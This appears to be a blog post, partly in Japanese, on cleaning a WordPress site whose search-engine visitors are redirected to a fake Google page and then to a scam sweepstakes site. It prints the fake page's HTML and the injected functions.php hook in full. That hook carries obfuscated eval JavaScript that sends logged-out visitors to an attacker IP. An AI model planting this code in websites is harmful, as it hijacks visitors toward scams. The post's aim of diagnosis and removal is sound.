I’ve decided to rewrite this article in English as many people seems to have the same trouble, but is very hard to find the solution. If you want this article in Japanese, click here. この記事の日本語版 “ワードプレスサイトが検索エンジンから来ると自動的に転送されてしまう症状” は左記リンクをクリックして下さい。
The beginning of this matter was when I googled my own site and clicked on it, it gets redirected to a “googesearch.biz” domain
At first, I thought that my PC got infected with a virus. But when I directly typed in the URL, it does not get redirected at all. Well, very clever. Anyway, I didin’t know what has caused this matter, so I cut my PC from the web and made a virus check, waited the entire night. But nothing.
Next, I made a check with “malwarebytes” to the entire system but nothing at all. So, now, what should I do? I made my decision to step on the mine once again.
After when the site got redirected successfully, it gets redirected again to another site.
The process are as follows:
- When an infected site gets searched in a search engine such as google, and the user clicks on it,
- and the infected site loads partially, or loads entirely, it gets redirected automatically to an URL address starting with “http://googosearch.biz”.
- Furthermore, when the “http://googosearch.biz” site loads successfully, it redirects to another site, at which my time was a sweepstakes site.
- If the “http://googosearch.biz” site does not load successfully, it just stays on that website that looks like a google site that looks a bit old.
The “googosearch.biz” domain gets redirected to the IP address of “91.223.89.112”. This IP address is for “googosearch.biz” and it redirects everything from what it get searched such as from google
This time, the search term of “802.3at” has been used to search Ragnite Blue in google.
[xml]http://googosearch.biz/search.php?ty=1&terms=802.3at[/xml]
After, when the the website gets successfully redirected, it gets redirected to the URL similar to below.
But, a popup appears first.
Popup screen when you have successfully loaded this malicious website.
http://topusaprizes.com/q/contest–/?sub1=q3&sub2=68226&sub3=1105135348
Screenshot of this malicious website.
Like those malicious softwares that looks like the antivirus softwares, this website is trying to look like google. However, its like the old google’s website and also, it can be seen that it failed to completely copy the google website and/or partially loaded google website.
Now, if you’ve installed malwarebytes and tried accessing this land mine, malwarebytes successfully denies access to this malicious website of “googosearch.biz”.
Loading this malicious website using Chrome
Malwarebytes successfully blocking this malicious website.
その時のログ。
<code> 09:47:38 Administrator IP-BLOCK 91.223.89.112 (Type: outgoing) 09:47:41 Administrator IP-BLOCK 91.223.89.112 (Type: outgoing) 09:47:47 Administrator IP-BLOCK 91.223.89.112 (Type: outgoing) </code>
As it was blocked, Chrome couldn’t load the page.
Malwarebytesにて悪質サイトのロードをブロックされたのでブラウザーにてロードを失敗した画面
Below is the code from the redirected malicious website “googosearch.biz”‘s html code. Do not use it for bad things!
<code>
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<title>802 - googosearch.biz Search</title>
<style>div,td,.n a,.n a:visited{color:#000}.ts td,.tc{padding:0}.ts,.tb{border-collapse:collapse}.f{color:#666}.flc,a.fl{color:#77c}a,.w,.q:visited,.q:active,.q,.b a,.b a:visited,.mblink:visited{color:#00c}a:visited{color:#551a8b}a:active{color:red}.t{background:#d5dff3;color:#000;padding:5px 1px 4px}.bb{border-bottom:1px solid #36c}.bt{border-top:1px solid #36c}.j{width:34em}.h{color:#36c}.i{color:#a90a08}.a{color:green}.z{display:none}div.n{margin-top:1ex}.n a,.n .i{font-size:10pt}.n .i,.b a{font-weight:bold}.b a{font-size:12pt}#np,#nn,.nr,#logo span,.ch{cursor:pointer;cursor:hand}.ta{padding:3px 3px 3px 5px}#tpa2,#tpa3{padding-top:9px}#mybar{float:left;font-weight:bold;height:22px;padding-left:2px}#gbh{border-top:1px solid #c9d7f1;font-size:0;height:0;position:absolute;right:0;top:24px;width:200%}#gbi{background:#fff;border:1px solid;border-color:#c9d7f1 #36c #36c #a2bae7;font-size:13px;top:24px;z-index:1000}#guser{padding-bottom:7px !important}#mybar,#guser{font-size:13px;padding-top:1px !important}@media all{.gb1,.gb3{height:22px;margin-right:.73em;vertical-align:top}}#gbi,.gb2{display:none;position:absolute;width:8em}.gb2{z-index:1001}#mybar a,#mybar a:active,#mybar a:visited{color:#00c;font-weight:normal}.gb2 a,.gb3 a{text-decoration:none}.gb2 a{display:block;padding:.2em .5em}#mybar .gb2 a:hover{background:#36c;color:#fff}.sl,.r{display:inline;font-weight:normal;margin:0}.sl{font-size:84%}.r{font-size:1em}.e{margin:.75em 0}.sm{display:block;margin:0;margin-left:40px}.slk td{padding-top:5px;padding-left:40px;vertical-align:top;font-size:84%}.slk div{text-indent:-10px;padding-left:10px}.n div,#logo span{background:url(images/nav.png) no-repeat;height:26px;overflow:hidden}.n .nr{background-position:-60px 0;width:16px}#np{width:44px}#nf{background-position:-26px 0;width:18px}#nc{background-position:-44px 0;width:16px}#nn{margin-right:4px;width:66px}#nl{width:46px}#nn,#nl{background-position:-106px 0}#logo{display:block;height:52px;margin:13px 0 7px;overflow:hidden;position:relative;width:150px}#logo span{background-position:0 -26px;height:100%;left:0;position:absolute;top:0;width:100%}body{font-family:arial,sans-serif}.g{margin:1em 0}#sd{font-size:84%;font-weight:bold}#ap{font-size:64%}</style>
<script>window.mybar={};(function(){;var g=window.mybar,a,f,h;function m(b,e,d){b.display=b.display=="block"?"none":"block";b.left=e+"px";b.top=d+"px"}g.tg=function(b){var e=0,d,c,i,j=0,k=window.navExtra;!f&&(f=document.getElementById("mybar"));!h&&(h=f.getElementsByTagName("span"));(b||window.event).cancelBubble=true;if(!a){a=document.createElement(Array.every||window.createPopup?"iframe":"div");a.frameBorder="0";a.id="gbi";a.scrolling="no";a.src="#";document.body.appendChild(a);if(k)for(var n in k){var l=document.createElement("span");l.appendChild(k[n]);l.className="gb2";f.appendChild(l)}document.onclick=g.close}for(;h[j];j++){c=h[j];i=c.className;if(i=="gb3"){d=c.offsetLeft;while(c=c.offsetParent)d+=c.offsetLeft;m(a.style,d,24)}else if(i=="gb2"){m(c.style,d+1,25+e);e+=20}}a.style.height=e+"px"};g.close=function(b){a&&a.style.display=="block"&&g.tg(b)};})();</script>
</head>
<body topmargin="3" bgcolor="#ffffff" marginheight="3">
<div id="mybar">
<nobr>
<span class="gb1"><a href="/">Web</a></span>
<span class="gb1"><a href="search.php?terms=cash">Cash</a></span>
<span class="gb1"><a href="search.php?terms=insurance">Insurance</a></span>
<span class="gb1"><a href="search.php?terms=gambling">Gambling</a></span>
<span class="gb1"><a href="search.php?terms=download">Download</a></span>
<span class="gb1"><a href="search.php?terms=domains">Domains</a></span>
</nobr>
</div>
<div id="gbh"></div>
<div id="guser" style="padding: 0pt 0pt 4px; font-size: 84%;" width="100%" align="right"><nobr><a href="search.php?terms=weather">Weather</a></nobr></div>
<table class="tb" style="clear: left;" width="100%">
<tbody>
<tr>
<form method="get" action="/search.php">
<td style="padding: 0pt 0pt 7px 0px;" valign="top" width="100%">
<table class="tb" style="margin-top: 25px;" border=0>
<tbody>
<tr>
<td class="tc" nowrap="nowrap">
<input name="terms" size="41" maxlength="2048" value="802" title="Search" type="text"><input value="Search" type="submit"></td>
</tr>
</tbody>
</table>
</td>
</form>
</tr>
</tbody>
</table>
<table class="t bt" border="0" cellpadding="0" cellspacing="0" width="100%">
<tbody>
<tr>
<td nowrap="nowrap"><span id="sd">&nbsp;Web&nbsp;</span></td>
<td align="right" nowrap="nowrap"><font size="-1">Results for <b>802</b>. (<b>0</b> seconds)&nbsp;</font>
</td>
</tr>
</tbody>
</table>
<div id="res">
<div>
</div>
<br clear="all">
</div>
<center>
<br clear="all">
<table class="ft t bb bt" border="0" cellpadding="0" cellspacing="0" width="100%">
<tbody>
<tr>
<td align="center">&nbsp;<br>
<table align="center" border="0" cellpadding="0" cellspacing="0">
<form method="get" action="/search.php">
<tbody>
<tr>
<td nowrap="nowrap">
<font size="-1">
<input name="terms" size="31" maxlength="2048" value="802" title="Search" type="text">
<input value="Search" type="submit">
</font>
<br /><br />
</td>
</tr>
</tbody>
</form>
</table>
</td>
</tr>
</tbody>
</table>
</center>
<center>
<p>
</p>
<hr class="z">
<div style="padding: 2px;" class=""><font size="-1">&#169;2008-2011 googosearch.biz</font>
</div>
</center>
</body>
</html>
</code>
Below is the code that actually does the bad thing that is implemented in the “functions.php” file.
<code>
<?php
add_action('get_footer', 'add_sscounter');
function add_sscounter(){
echo '<!--scounter-->';
if(function_exists('is_user_logged_in')){
if(time()%2 == 0 && !is_user_logged_in()){
echo "<script language=\"JavaScript\">eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c][/c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\\w+'};c=1};while(c--)if(k[c][/c])p=p.replace(new RegExp('\\\b'+e(c)+'\\\b','g'),k[c][/c][/c]);return p}('o r=a.e,t=\"\",q;5(r.4(\"m.\")!=-1)t=\"q\";5(r.4(\"b.\")!=-1)t=\"q\";5(r.4(\"c.\")!=-1)t=\"p\";5(r.4(\"f.\")!=-1)t=\"q\";5(r.4(\"g.\")!=-1)t=\"h\";5(r.4(\"i.\")!=-1)t=\"q\";5(t.6&&((q=r.4(\"?\"+t+\"=\"))!=-1||(q=r.4(\"&\"+t+\"=\"))!=-1))j.k=\"l://9\"+\"1.\"+\"n\"+\"3\"+\".\"+\"8\"+\"9.1\"+\"s/\"+\"u.p\"+\"v?w\"+\"d=7&t\"+\"x\"+\"y=\"+r.z(q+2+t.6).A(\"&\")[0];',37,37,'||||indexOf|if|length||||document|msn|yahoo||referrer|altavista|aol|query|ask|window|location|http|google|22|var||||12||go|hp|si|er|ms|substring|split'.split('|'),0,{}))</script>";
}
}
}
?></code>
If you’re having this problem, just delete the above code from your “functions.php” file and upload the corrected file to your server and everything shall be good as before!
コメント